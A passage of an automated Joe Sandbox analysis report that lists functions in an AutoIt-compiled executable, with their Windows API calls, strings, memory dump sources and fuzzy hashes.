                                                                                                                                    • Associated: 0000000F.00000002.3346248500.0000000000329000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_15_2_260000_Blank.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: #111
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 568940515-0
                                                                                                                                    • Opcode ID: b27ba6251c2a124069ef44f8deffb4357f346321c7d0a5921ad44ad94d19405a
                                                                                                                                    • Instruction ID: 08a2fe56a0eaaefd1008c87aca7f36457ce8716d8d911c5060eadcda3e8ef07a
                                                                                                                                    • Opcode Fuzzy Hash: b27ba6251c2a124069ef44f8deffb4357f346321c7d0a5921ad44ad94d19405a
                                                                                                                                    • Instruction Fuzzy Hash: 7A31D371620108AFDB10AF24DC89FBE77A9EB44760F04802AF905EB391CB70AC54CFA1
                                                                                                                                    Function 002BE360 Relevance: 10.6, APIs: 7, Instructions: 90COMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    APIs
                                                                                                                                    • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 002BE3A5
                                                                                                                                    • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 002BE3CB
                                                                                                                                    • #2.WSOCK32(00000000), ref: 002BE3CE
                                                                                                                                    • #2.WSOCK32 ref: 002BE3EF
                                                                                                                                    • #6.OLEAUT32 ref: 002BE3F8
                                                                                                                                    • StringFromGUID2.OLE32(?,?,00000028), ref: 002BE412
                                                                                                                                    • #2.WSOCK32(?), ref: 002BE420
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 0000000F.00000002.3345957016.0000000000261000.00000020.00000001.01000000.00000008.sdmp, Offset: 00260000, based on PE: true
                                                                                                                                    • Associated: 0000000F.00000002.3345908033.0000000000260000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    • Associated: 0000000F.00000002.3346076517.00000000002F0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    • Associated: 0000000F.00000002.3346076517.0000000000316000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    • Associated: 0000000F.00000002.3346181883.0000000000320000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    • Associated: 0000000F.00000002.3346181883.0000000000324000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    • Associated: 0000000F.00000002.3346248500.0000000000329000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_15_2_260000_Blank.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: ByteCharMultiWide$FromString
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 1211328463-0
                                                                                                                                    • Opcode ID: c21962f8289e066f1ccef485882fff75661abf386c12faa9e67bb198683a701d
                                                                                                                                    • Instruction ID: d9b830f039af5ac964ffcc77177443b6269060e47cfc24d2ca993be78b5ea140
                                                                                                                                    • Opcode Fuzzy Hash: c21962f8289e066f1ccef485882fff75661abf386c12faa9e67bb198683a701d
                                                                                                                                    • Instruction Fuzzy Hash: 9D217735615109AFAF109FA8DCC8CFE77ECEB083A0B018125F955CB2A1D670EC51CB64
                                                                                                                                    Function 002BFE19 Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 90COMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    APIs
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 0000000F.00000002.3345957016.0000000000261000.00000020.00000001.01000000.00000008.sdmp, Offset: 00260000, based on PE: true
                                                                                                                                    • Associated: 0000000F.00000002.3345908033.0000000000260000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    • Associated: 0000000F.00000002.3346076517.00000000002F0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    • Associated: 0000000F.00000002.3346076517.0000000000316000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    • Associated: 0000000F.00000002.3346181883.0000000000320000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    • Associated: 0000000F.00000002.3346181883.0000000000324000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    • Associated: 0000000F.00000002.3346248500.0000000000329000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_15_2_260000_Blank.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: __wcsnicmp
                                                                                                                                    • String ID: #OnAutoItStartRegister$#notrayicon$#requireadmin
                                                                                                                                    • API String ID: 1038674560-2734436370
                                                                                                                                    • Opcode ID: 2474c7de53e85ec194110fcad2cd77dab3a17c9075978478f7cb769e32c120fa
                                                                                                                                    • Instruction ID: 4ed1052023e38e0aeb8eb889c04b879c8c46cd6c802a9670275b815041f0f114
                                                                                                                                    • Opcode Fuzzy Hash: 2474c7de53e85ec194110fcad2cd77dab3a17c9075978478f7cb769e32c120fa
                                                                                                                                    • Instruction Fuzzy Hash: A8212532131112A6D371FA249D02AFBB2989F55780F508436F846865A3E7A1EEB28795
                                                                                                                                    Function 002E7BF2 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 75windowCOMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    APIs
                                                                                                                                      • Part of subcall function 00262111: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,00000096), ref: 0026214F
                                                                                                                                      • Part of subcall function 00262111: GetStockObject.GDI32(00000011), ref: 00262163
                                                                                                                                      • Part of subcall function 00262111: SendMessageW.USER32(00000000,00000030,00000000), ref: 0026216D
                                                                                                                                    • SendMessageW.USER32(00000000,00002001,00000000,FF000000), ref: 002E7C57
                                                                                                                                    • SendMessageW.USER32(?,00000409,00000000,FF000000), ref: 002E7C64
                                                                                                                                    • SendMessageW.USER32(?,00000402,00000000,00000000), ref: 002E7C6F
                                                                                                                                    • SendMessageW.USER32(?,00000401,00000000,00640000), ref: 002E7C7E
                                                                                                                                    • SendMessageW.USER32(?,00000404,00000001,00000000), ref: 002E7C8A
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 0000000F.00000002.3345957016.0000000000261000.00000020.00000001.01000000.00000008.sdmp, Offset: 00260000, based on PE: true
                                                                                                                                    • Associated: 0000000F.00000002.3345908033.0000000000260000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    • Associated: 0000000F.00000002.3346076517.00000000002F0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    • Associated: 0000000F.00000002.3346076517.0000000000316000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    • Associated: 0000000F.00000002.3346181883.0000000000320000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    • Associated: 0000000F.00000002.3346181883.0000000000324000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    • Associated: 0000000F.00000002.3346248500.0000000000329000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_15_2_260000_Blank.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: MessageSend$CreateObjectStockWindow
                                                                                                                                    • String ID: Msctls_Progress32
                                                                                                                                    • API String ID: 1025951953-3636473452
                                                                                                                                    • Opcode ID: a05110576b54aac7e8a5569f85cc116433b3ecc39db17d6d5bbf02b79047e08d
                                                                                                                                    • Instruction ID: 658efbc0eb4c653314301dd35ca65fbcc06e007b8fc5419c45c8f354dad7515b
                                                                                                                                    • Opcode Fuzzy Hash: a05110576b54aac7e8a5569f85cc116433b3ecc39db17d6d5bbf02b79047e08d
                                                                                                                                    • Instruction Fuzzy Hash: 6011B2B2154219BEEF158F61CC85EE77F5DEF087A8F115115BA08A20A0C7729C21DBA4
                                                                                                                                    Function 002C9ED8 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 61COMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    APIs
                                                                                                                                    • CreateStreamOnHGlobal.OLE32(00000000,00000001,?,?,?,?,?,002B0817,?,?,00000000,00000000), ref: 002C9EE8
                                                                                                                                    • FindResourceExW.KERNEL32(?,0000000A,SCRIPT,00000000,?,?,002B0817,?,?,00000000,00000000), ref: 002C9EFF
                                                                                                                                    • LoadResource.KERNEL32(?,00000000,?,?,002B0817,?,?,00000000,00000000,?,?,?,?,?,?,00274A14), ref: 002C9F0F
                                                                                                                                    • SizeofResource.KERNEL32(?,00000000,?,?,002B0817,?,?,00000000,00000000,?,?,?,?,?,?,00274A14), ref: 002C9F20
                                                                                                                                    • LockResource.KERNEL32(002B0817,?,?,002B0817,?,?,00000000,00000000,?,?,?,?,?,?,00274A14,00000000), ref: 002C9F2F
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 0000000F.00000002.3345957016.0000000000261000.00000020.00000001.01000000.00000008.sdmp, Offset: 00260000, based on PE: true
                                                                                                                                    • Associated: 0000000F.00000002.3345908033.0000000000260000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    • Associated: 0000000F.00000002.3346076517.00000000002F0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    • Associated: 0000000F.00000002.3346076517.0000000000316000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    • Associated: 0000000F.00000002.3346181883.0000000000320000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    • Associated: 0000000F.00000002.3346181883.0000000000324000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    • Associated: 0000000F.00000002.3346248500.0000000000329000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_15_2_260000_Blank.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: Resource$CreateFindGlobalLoadLockSizeofStream
                                                                                                                                    • String ID: SCRIPT
                                                                                                                                    • API String ID: 3051347437-3967369404
                                                                                                                                    • Opcode ID: dd6e804a246ddd61ca3d42d1bf8829c9633ff28d57a16248e2cf146af10e7c3e
                                                                                                                                    • Instruction ID: ff94f088fb6ce24aa1c9fc0267b4290ebc706205f4d48d5eaa61eb831a3f7d41
                                                                                                                                    • Opcode Fuzzy Hash: dd6e804a246ddd61ca3d42d1bf8829c9633ff28d57a16248e2cf146af10e7c3e
                                                                                                                                    • Instruction Fuzzy Hash: BA115A70200701AFE7218B25EC8CF677BB9EBC5B51F10826CB909D6661DB71EC44C670
                                                                                                                                    Function 00289D16 Relevance: 10.5, APIs: 7, Instructions: 45threadCOMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    APIs
                                                                                                                                    • __init_pointers.LIBCMT ref: 00289D16
                                                                                                                                      • Part of subcall function 002833B7: EncodePointer.KERNEL32(00000000), ref: 002833BA
                                                                                                                                      • Part of subcall function 002833B7: __initp_misc_winsig.LIBCMT ref: 002833D5
                                                                                                                                      • Part of subcall function 002833B7: GetModuleHandleW.KERNEL32(kernel32.dll), ref: 0028A0D0
                                                                                                                                      • Part of subcall function 002833B7: GetProcAddress.KERNEL32(00000000,FlsAlloc), ref: 0028A0E4
                                                                                                                                      • Part of subcall function 002833B7: GetProcAddress.KERNEL32(00000000,FlsFree), ref: 0028A0F7
                                                                                                                                      • Part of subcall function 002833B7: GetProcAddress.KERNEL32(00000000,FlsGetValue), ref: 0028A10A
                                                                                                                                      • Part of subcall function 002833B7: GetProcAddress.KERNEL32(00000000,FlsSetValue), ref: 0028A11D
                                                                                                                                      • Part of subcall function 002833B7: GetProcAddress.KERNEL32(00000000,InitializeCriticalSectionEx), ref: 0028A130
                                                                                                                                      • Part of subcall function 002833B7: GetProcAddress.KERNEL32(00000000,CreateEventExW), ref: 0028A143
                                                                                                                                      • Part of subcall function 002833B7: GetProcAddress.KERNEL32(00000000,CreateSemaphoreExW), ref: 0028A156
                                                                                                                                      • Part of subcall function 002833B7: GetProcAddress.KERNEL32(00000000,SetThreadStackGuarantee), ref: 0028A169
                                                                                                                                      • Part of subcall function 002833B7: GetProcAddress.KERNEL32(00000000,CreateThreadpoolTimer), ref: 0028A17C
                                                                                                                                      • Part of subcall function 002833B7: GetProcAddress.KERNEL32(00000000,SetThreadpoolTimer), ref: 0028A18F
                                                                                                                                      • Part of subcall function 002833B7: GetProcAddress.KERNEL32(00000000,WaitForThreadpoolTimerCallbacks), ref: 0028A1A2
                                                                                                                                      • Part of subcall function 002833B7: GetProcAddress.KERNEL32(00000000,CloseThreadpoolTimer), ref: 0028A1B5
                                                                                                                                      • Part of subcall function 002833B7: GetProcAddress.KERNEL32(00000000,CreateThreadpoolWait), ref: 0028A1C8
                                                                                                                                      • Part of subcall function 002833B7: GetProcAddress.KERNEL32(00000000,SetThreadpoolWait), ref: 0028A1DB
                                                                                                                                      • Part of subcall function 002833B7: GetProcAddress.KERNEL32(00000000,CloseThreadpoolWait), ref: 0028A1EE
                                                                                                                                    • __mtinitlocks.LIBCMT ref: 00289D1B
                                                                                                                                    • __mtterm.LIBCMT ref: 00289D24
                                                                                                                                      • Part of subcall function 00289D8C: DeleteCriticalSection.KERNEL32(00000000,00000000,?,?,00289D29,00287EFD,0031CD38,00000014), ref: 00289E86
                                                                                                                                      • Part of subcall function 00289D8C: _free.LIBCMT ref: 00289E8D
                                                                                                                                      • Part of subcall function 00289D8C: DeleteCriticalSection.KERNEL32(00320C00,?,?,00289D29,00287EFD,0031CD38,00000014), ref: 00289EAF
                                                                                                                                    • __calloc_crt.LIBCMT ref: 00289D49
                                                                                                                                    • __initptd.LIBCMT ref: 00289D6B
                                                                                                                                    • GetCurrentThreadId.KERNEL32 ref: 00289D72
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 0000000F.00000002.3345957016.0000000000261000.00000020.00000001.01000000.00000008.sdmp, Offset: 00260000, based on PE: true
                                                                                                                                    • Associated: 0000000F.00000002.3345908033.0000000000260000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    • Associated: 0000000F.00000002.3346076517.00000000002F0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    • Associated: 0000000F.00000002.3346076517.0000000000316000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    • Associated: 0000000F.00000002.3346181883.0000000000320000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    • Associated: 0000000F.00000002.3346181883.0000000000324000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    • Associated: 0000000F.00000002.3346248500.0000000000329000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_15_2_260000_Blank.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: AddressProc$CriticalDeleteSection$CurrentEncodeHandleModulePointerThread__calloc_crt__init_pointers__initp_misc_winsig__initptd__mtinitlocks__mtterm_free
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 3567560977-0
                                                                                                                                    • Opcode ID: 630af8713cf6872047fd1ddae2dfb76d88ac836e7919ddf6cc6875285cec76fa
                                                                                                                                    • Instruction ID: 4330e02ea46e18c33aba5e8e63b079b223a1a21085f2c26f9a8772ab8624b91f
                                                                                                                                    • Opcode Fuzzy Hash: 630af8713cf6872047fd1ddae2dfb76d88ac836e7919ddf6cc6875285cec76fa
                                                                                                                                    • Instruction Fuzzy Hash: D9F0963A53771259E7397B747C0366A26D4DF45B70F18061AF454D50D3EF1184E24B94
                                                                                                                                    Function 002750DB Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 44COMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    APIs
                                                                                                                                    • CreateWindowExW.USER32(00000000,AutoIt v3,AutoIt v3,00CF0000,80000000,80000000,0000012C,00000064,00000000,00000000,00000000,00000001), ref: 00275109
                                                                                                                                    • CreateWindowExW.USER32(00000000,edit,00000000,50B008C4,00000000,00000000,00000000,00000000,00000000,00000001,00000000), ref: 0027512A
                                                                                                                                    • ShowWindow.USER32(00000000), ref: 0027513E
                                                                                                                                    • ShowWindow.USER32(00000000), ref: 00275147
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 0000000F.00000002.3345957016.0000000000261000.00000020.00000001.01000000.00000008.sdmp, Offset: 00260000, based on PE: true
                                                                                                                                    • Associated: 0000000F.00000002.3345908033.0000000000260000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    • Associated: 0000000F.00000002.3346076517.00000000002F0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    • Associated: 0000000F.00000002.3346076517.0000000000316000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    • Associated: 0000000F.00000002.3346181883.0000000000320000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    • Associated: 0000000F.00000002.3346181883.0000000000324000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    • Associated: 0000000F.00000002.3346248500.0000000000329000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_15_2_260000_Blank.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: Window$CreateShow
                                                                                                                                    • String ID: AutoIt v3$edit
                                                                                                                                    • API String ID: 1584632944-3779509399
                                                                                                                                    • Opcode ID: 4c8722b59f0e8b907c91c697192a729b5f61c0d6755011bd23894c95e4cdd443
                                                                                                                                    • Instruction ID: 3ef2a0f09acb1cd11cf0900497dd2a613d70043b8842a457129d33f33548ea71
                                                                                                                                    • Opcode Fuzzy Hash: 4c8722b59f0e8b907c91c697192a729b5f61c0d6755011bd23894c95e4cdd443
                                                                                                                                    • Instruction Fuzzy Hash: 8AF0DA71545394BEEB3217276C4DE776E7DE7C6F60F10052EFA00A21B1C6711852DAB0
                                                                                                                                    Function 002841B9 Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 24libraryloaderCOMMONLIBRARYCODE
                                                                                                                                    Download Yara Rule
                                                                                                                                    APIs
                                                                                                                                    • LoadLibraryExW.KERNEL32(combase.dll,00000000,00000800,RoInitialize,00284282,?), ref: 002841D3
                                                                                                                                    • GetProcAddress.KERNEL32(00000000), ref: 002841DA
                                                                                                                                    • EncodePointer.KERNEL32(00000000), ref: 002841E6
                                                                                                                                    • DecodePointer.KERNEL32(00000001,00284282,?), ref: 00284203
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 0000000F.00000002.3345957016.0000000000261000.00000020.00000001.01000000.00000008.sdmp, Offset: 00260000, based on PE: true
                                                                                                                                    • Associated: 0000000F.00000002.3345908033.0000000000260000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    • Associated: 0000000F.00000002.3346076517.00000000002F0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    • Associated: 0000000F.00000002.3346076517.0000000000316000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    • Associated: 0000000F.00000002.3346181883.0000000000320000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    • Associated: 0000000F.00000002.3346181883.0000000000324000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    • Associated: 0000000F.00000002.3346248500.0000000000329000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_15_2_260000_Blank.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: Pointer$AddressDecodeEncodeLibraryLoadProc
                                                                                                                                    • String ID: RoInitialize$combase.dll
                                                                                                                                    • API String ID: 3489934621-340411864
                                                                                                                                    • Opcode ID: 4131597f9417d94d594b8ba17505ce44c7a77a04e28a574b6dfdec9f2d3ded0a
                                                                                                                                    • Instruction ID: e19af99bf075d46aea596df084bdb03708f2fe2e6a0ec297b5fe209b472bfaa2
                                                                                                                                    • Opcode Fuzzy Hash: 4131597f9417d94d594b8ba17505ce44c7a77a04e28a574b6dfdec9f2d3ded0a
                                                                                                                                    • Instruction Fuzzy Hash: A9E04F746A1706AFDF216F70FC8DB683668B711B56F604438F501D50E1CBB562A6CF10
                                                                                                                                    Function 0028428E Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 19libraryloaderCOMMONLIBRARYCODE
                                                                                                                                    Download Yara Rule
                                                                                                                                    APIs
                                                                                                                                    • LoadLibraryExW.KERNEL32(combase.dll,00000000,00000800,RoUninitialize,002841A8), ref: 002842A8
                                                                                                                                    • GetProcAddress.KERNEL32(00000000), ref: 002842AF
                                                                                                                                    • EncodePointer.KERNEL32(00000000), ref: 002842BA
                                                                                                                                    • DecodePointer.KERNEL32(002841A8), ref: 002842D5
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 0000000F.00000002.3345957016.0000000000261000.00000020.00000001.01000000.00000008.sdmp, Offset: 00260000, based on PE: true
                                                                                                                                    • Associated: 0000000F.00000002.3345908033.0000000000260000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    • Associated: 0000000F.00000002.3346076517.00000000002F0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    • Associated: 0000000F.00000002.3346076517.0000000000316000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    • Associated: 0000000F.00000002.3346181883.0000000000320000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    • Associated: 0000000F.00000002.3346181883.0000000000324000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    • Associated: 0000000F.00000002.3346248500.0000000000329000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_15_2_260000_Blank.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: Pointer$AddressDecodeEncodeLibraryLoadProc
                                                                                                                                    • String ID: RoUninitialize$combase.dll
                                                                                                                                    • API String ID: 3489934621-2819208100
                                                                                                                                    • Opcode ID: b6535743efe98cab3b86c23498fc3c26c5c86b990176f4a82ba0bbd5c1893757
                                                                                                                                    • Instruction ID: cfae92a6b5e80259750d5a763e6a5fe9a1e85ce74f7cc1edf7b105c382f10ce7
                                                                                                                                    • Opcode Fuzzy Hash: b6535743efe98cab3b86c23498fc3c26c5c86b990176f4a82ba0bbd5c1893757
                                                                                                                                    • Instruction Fuzzy Hash: 1AE0EC705A1706AFEF22AF60FD4DB653A68B704B92F500139F901D50E5CBB56725CB50
                                                                                                                                    Function 0026218F Relevance: 9.3, APIs: 6, Instructions: 254COMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    APIs
                                                                                                                                    • GetClientRect.USER32(?,?), ref: 002621B8
                                                                                                                                    • GetWindowRect.USER32(?,?), ref: 002621F9
                                                                                                                                    • ScreenToClient.USER32(?,?), ref: 00262221
                                                                                                                                    • GetClientRect.USER32(?,?), ref: 00262350
                                                                                                                                    • GetWindowRect.USER32(?,?), ref: 00262369
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 0000000F.00000002.3345957016.0000000000261000.00000020.00000001.01000000.00000008.sdmp, Offset: 00260000, based on PE: true
                                                                                                                                    • Associated: 0000000F.00000002.3345908033.0000000000260000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    • Associated: 0000000F.00000002.3346076517.00000000002F0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    • Associated: 0000000F.00000002.3346076517.0000000000316000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    • Associated: 0000000F.00000002.3346181883.0000000000320000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    • Associated: 0000000F.00000002.3346181883.0000000000324000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    • Associated: 0000000F.00000002.3346248500.0000000000329000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_15_2_260000_Blank.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: Rect$Client$Window$Screen
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 1296646539-0
                                                                                                                                    • Opcode ID: 5cbe8f932a54099dc36bff95ea5fc7cb5f6e9fcfe0773018ff2c5be76b96012f
                                                                                                                                    • Instruction ID: f2a29a34df7deebdea0a6b3b76696fad351ecdb195369fb3e25369eb0743c6da
                                                                                                                                    • Opcode Fuzzy Hash: 5cbe8f932a54099dc36bff95ea5fc7cb5f6e9fcfe0773018ff2c5be76b96012f
                                                                                                                                    • Instruction Fuzzy Hash: 67B1AF3992064ADBDF10CFA8C5807EDB7B1FF08710F148169ED99EB251DB70A9A4CB54
                                                                                                                                    Function 002C6A73 Relevance: 9.2, APIs: 6, Instructions: 205COMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    APIs
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 0000000F.00000002.3345957016.0000000000261000.00000020.00000001.01000000.00000008.sdmp, Offset: 00260000, based on PE: true
                                                                                                                                    • Associated: 0000000F.00000002.3345908033.0000000000260000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    • Associated: 0000000F.00000002.3346076517.00000000002F0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    • Associated: 0000000F.00000002.3346076517.0000000000316000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    • Associated: 0000000F.00000002.3346181883.0000000000320000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    • Associated: 0000000F.00000002.3346181883.0000000000324000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    • Associated: 0000000F.00000002.3346248500.0000000000329000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_15_2_260000_Blank.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: _memmove$__itow__swprintf
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 3253778849-0
                                                                                                                                    • Opcode ID: 2696e12063a3b11363449afd863cb5a64b0c4321d8bd4eeec82fdae650dcda9c
                                                                                                                                    • Instruction ID: 2b068ed30d2b8c22efa9d3458876eb5616d715103710e381f3103243a1b8f445
                                                                                                                                    • Opcode Fuzzy Hash: 2696e12063a3b11363449afd863cb5a64b0c4321d8bd4eeec82fdae650dcda9c
                                                                                                                                    • Instruction Fuzzy Hash: 9A619C3052069AABCB11FF60CC89FFE37A8AF05308F044659F8996B1D2DB359D66CB50
                                                                                                                                    Function 002E0844 Relevance: 9.2, APIs: 6, Instructions: 167registryCOMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    APIs
                                                                                                                                      • Part of subcall function 00271A36: _memmove.LIBCMT ref: 00271A77
                                                                                                                                      • Part of subcall function 002E147A: CharUpperBuffW.USER32(?,?,?,?,?,?,?,002E040D,?,?), ref: 002E1491
                                                                                                                                    • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 002E091D
                                                                                                                                    • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 002E095D
                                                                                                                                    • RegCloseKey.ADVAPI32(?,00000001,00000000), ref: 002E0980
                                                                                                                                    • RegEnumValueW.ADVAPI32(?,-00000001,?,?,00000000,?,00000000,00000000), ref: 002E09A9
                                                                                                                                    • RegCloseKey.ADVAPI32(?,?,00000000), ref: 002E09EC
                                                                                                                                    • RegCloseKey.ADVAPI32(00000000), ref: 002E09F9
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 0000000F.00000002.3345957016.0000000000261000.00000020.00000001.01000000.00000008.sdmp, Offset: 00260000, based on PE: true
                                                                                                                                    • Associated: 0000000F.00000002.3345908033.0000000000260000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    • Associated: 0000000F.00000002.3346076517.00000000002F0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    • Associated: 0000000F.00000002.3346076517.0000000000316000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    • Associated: 0000000F.00000002.3346181883.0000000000320000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    • Associated: 0000000F.00000002.3346181883.0000000000324000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    • Associated: 0000000F.00000002.3346248500.0000000000329000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_15_2_260000_Blank.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: Close$BuffCharConnectEnumOpenRegistryUpperValue_memmove
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 4046560759-0
                                                                                                                                    • Opcode ID: 92aace207c274463dd0a741d179e126d21022fd2c2e95686ddf46e4bf4b9df92
                                                                                                                                    • Instruction ID: f621681c019ab4b9a3908ce463f8f100a48aae79091a7eb1dfe0e497ac94f3f6
                                                                                                                                    • Opcode Fuzzy Hash: 92aace207c274463dd0a741d179e126d21022fd2c2e95686ddf46e4bf4b9df92
                                                                                                                                    • Instruction Fuzzy Hash: 62519C31128241AFD710EF65C885E6EBBE8FF84710F40492DF489872A2DB71E965CF52
                                                                                                                                    Function 002E5DD6 Relevance: 9.2, APIs: 6, Instructions: 160windowCOMMON
                                                                                                                                    Download Yara Rule
